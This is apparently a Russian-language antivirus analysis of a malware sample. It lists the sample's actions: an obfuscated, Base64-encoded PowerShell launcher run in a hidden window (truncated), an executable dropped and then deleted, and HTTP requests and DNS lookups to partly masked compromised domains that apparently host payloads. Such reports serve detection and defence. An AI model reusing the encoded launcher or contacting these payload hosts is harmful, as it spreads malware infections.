Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0ASQB0AEUAbQAgACgAIgBWACIAKwAiAEEAUgBJAEEAYgBMAEUAOgBYACIAKwAiADEAQQAiACsAIgAwAHoATgAiACkAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQ...
Изменения в файловой системе
Создает следующие файлы
- %HOMEPATH%\qvwis2h\mxk437n\y6ecz5.exe
Удаляет следующие файлы
- %HOMEPATH%\qvwis2h\mxk437n\y6ecz5.exe
Сетевая активность
TCP
Запросы HTTP GET
- http://we####pornpussy.com/cgi-bin/TXGpC07/
- http://ne#.###fitsbrand.com/wp-includes/N1va/
- http://se####aloutfits.com/gfeed/j154TTx/
- http://kh####pdn247.com/remington-870/5DNY9x/
- http://je###issan.com/wp-content/N7/
- http://ne####cept-ci.com/securityl/cid/
UDP
- DNS ASK cu####lulut.info
- DNS ASK ta###hizhi.com
- DNS ASK we####pornpussy.com
- DNS ASK ne#.###fitsbrand.com
- DNS ASK se####aloutfits.com
- DNS ASK kh####pdn247.com
- DNS ASK je###issan.com
- DNS ASK ne####cept-ci.com
- DNS ASK bi#.ly
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -ENCOD IAAgAFMARQBUAC0ASQB0AEUAbQAgACgAIgBWACIAKwAiAEEAUgBJAEEAYgBMAEUAOgBYACIAKwAiADEAQQAiACsAIgAwAHoATgAiACkAIAAoAFsAdAB5AHAAZQBdACgAIgB7ADIAfQB7ADMAfQB7ADEAfQB7ADAAfQAiACAALQ...' (со скрытым окном)
